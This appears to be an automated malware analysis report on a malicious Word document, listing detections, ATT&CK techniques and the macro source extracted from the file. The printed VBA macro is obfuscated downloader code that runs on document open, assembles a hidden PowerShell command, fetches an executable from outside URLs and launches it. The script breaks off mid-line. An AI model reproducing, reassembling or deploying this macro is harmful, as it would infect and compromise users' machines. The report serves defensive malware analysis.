Verdict: MALICIOUS (risk score 202)

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic); T1203 (Exploitation for Client Execution)
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro uses the Shell() function to execute a command, a technique commonly used to download and execute further malicious payloads. The combination of the Shell() call and the AutoOpen macro strongly suggests an intent to compromise the user's system.
Heuristics (6)

- ClamAV: Doc.Malware.Generic-6681834-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6681834-0
- VBA macros detected [medium] (OLE_VBA_MACROS; 2 related findings): Document contains VBA macro code
- Shell() call in VBA [critical] (OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4708 bytes |

SHA-256 of macros.bas: f9c1f6132345ef71ca3f8b21fe35cf70e261feaf6c23876c2803d83bd13241bf

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "BEvloVO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set sjjvvP = CpBTQm
Set ivURV = QIikbV
Set OAwRj = wJQzvS
Set dFMOvc = zmRGRN
Set kLiCa = DDsRf
Shell iEIhFV + tzofhkzQ + HlJaRhODl + ilEiSEEl + mCztbkMUdYzzO, Format(0)
Set MziiU = tnimU
Set UVaKVb = kSOGzO
End Sub
Attribute VB_Name = "nKhXzYGHaG"
Function iEIhFV()
On _
Error _
Resume _
Next
Set HNLVhb = EfGsSi
Set biluj = WLvYz
Set rhrPj = zBYwFS
aGLWUG = Format(Chr(5 + 12 + 17 + 16 + 49)) + "md /V" + "/" + Format(Chr(3 + 8 + 12 + 10 + 34)) + Format(Chr(1 + 3 + 5 + 5 + 20)) + "^" + "s^et" + " ^" + "G^TK" + "= ^ " + " ^ " + "^ ^ ^" + " ^ ^ ^"
Set sjhjW = paiiJK
tjmbji = " ^ ^ " + " ^" + " " + "^ ^" + "}^}^" + "{^h" + Format(Chr(5 + 12 + 17 + 16 + 49))
Set nCRcBt = QMzDzn
Set wQjjF = RiiEB
Set bFiPzk = RiTnB
Set RwfGB = WluTW
jVnKuZ = "t^a" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "^" + "}^;^k" + "^a^er^" + "b^;^H^" + "ij^$ " + "^me^t" + "I^"
Set LLtZzP = RqlIJ
nnUXB = "-e^" + "k^o" + "vn" + "I" + "^;)^H" + "i^" + "j$^ ^" + ",z^MP" + "^$(^e" + "l^i^" + "F"
Set avwMlC = nRFEha
Set bINPDm = knThWU
Set AMRZA = KXnZCh
iLAZwwWmB = "^d^aoln" + "wo^D" + "^" + ".p" + Format(Chr(3 + 8 + 12 + 10 + 34)) + "^a^" + "${" + "^" + "yr^t" + "{)^zP"
Set tuiSk = rhEIRl
Set AEEmMX = JjjcNv
ZCqDNwkY = "b^" + "$ n" + "^i^ zM^" + "P$(^" + "h" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "a^" + "er^o^f;" + "^" + "'^e^x" + "e^.^'"
Set LupXAf = luNUD
Set NEQWf = CHNfE
Set ckKNa = zdotj
kNAWhtWhJj = "^" + "+^" + "i^W^W$" + "^" + "+" + "'\'+" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "^"
Set wZjTW = GwRzU
QilXQ = "ilb^up^" + ":vn" + "e$^=^H" + "^" + "ij^$^;'"
iEIhFV = aGLWUG + tjmbji + jVnKuZ + nnUXB + iLAZwwWmB + ZCqDNwkY + kNAWhtWhJj + QilXQ
Set YfXrw = DnOOv
Set jBuTiY = boFvXI
Set ZKhpwz = RpfYC
Set XqKPMz = PNQKhE
End Function
Function tzofhkzQ()
On _
Error _
Resume _
Next
Set acToLG = jADim
Set iOsLt = zBLaM
Set vAQCB = LVrCjU
RVZPMwc = "1^" + "6" + "4^'^ ^" + "=" + "^ ^i^"
Set IELIYt = iUGdl
Set LLrwiZ = smBMh
unsXFlmfN = "W" + "^W$" + ";)" + "^'@" + "'(t^" + "i^lpS^" + "." + "'" + "r" + "V" + "^3^o" + "6S^Q/^"
Set vrjDR = rObSE
Set UPOJc = wVLXqW
Set hiVavo = qpjcUP
SnwhSljdNiR = "lp^.o" + "fn^i^." + "l" + "e" + "i" + "prak" + "//^"
Set TtHrcC = QsZsW
Set ZrDbtF = rGQLU
Set ihITh = QjJSf
iAVnvbiP = ":^p" + "^t^t^h" + "@I/" + "^ur." + "^an" + "nav-" + "a^h^or^"
Set JmIPw = UMvsa
Set XjwwFw = uWJow
Set kQszW = kuKlf
Set tikwv = wwzZj
JfLiipiLYD = "k//" + ":p^t" + "^th@^7" + "/^p^ohs" + ".^y"
Set cTTWYb = KBRCY
Set ElrIfC = wmvoK
Set zpKOU = PzDTms
fqFPRQVdo = "^" + "sr^" + "uk//^:p" + "^tth@^J" + "a^W/et" + "^is" + "^." + "^str" + "^i^h" + "^s" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "ora" + "m"
tzofhkzQ = RVZPMwc + unsXFlmfN + SnwhSljdNiR + iAVnvbiP + JfLiipiLYD + fqFPRQVdo
Set motLvb = nBCBci
Set BQlPr = UdhGE
Set iYWmc = VScSm
End Function
Function HlJaRhODl()
On _
Error _
Resume _
Next
Set KuHMc = CTjrKL
Set zjPudE = ulacF
Set lQTwDc = vPvuPt
Set zhwmfk = KdzRj
Yzjpm = "/" + "/:^pt" + "t^h@^" + "z" + "^2/^mo" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "." + "^d^a^m" + "^a" + "^ho^" + "mn^a" + "^mel^" + "bo^m//"
Set AmwHaF = nCQiw
Set FcUlbL = iXCQSP
shrHEVOz = ":^pt^t" + "h'=z^Pb" + "$^;tnei" + "^l" + Format(Chr(3 + 8 + 12 + 10 + 34)) + "^be" + "W^.te"
Set WcwdiE = DYpwt
Set vIWvjw = UnutR
VAEsUO = "N t" + Format(Chr(5 + 12 + 17 + 16 + 49)) + "ejbo" + "^-^" + "w" + "en^=^p" + Format(Chr(3 + 8 + 12 + 10 + 34)) + "^a" + "^$^" + " ^ll^" + "eh^sr^" + "e^w" + "o^p&&^"
Set oCjQp = MPAFn
Set pJTjjj = HBjqvV
Set IpsGSt = zCPAP
Set MVQXqr = wTzKv
Set lNCWt = IvTbi
zAYjWk = "f^or /" + "^" + "L %^E
... (truncated)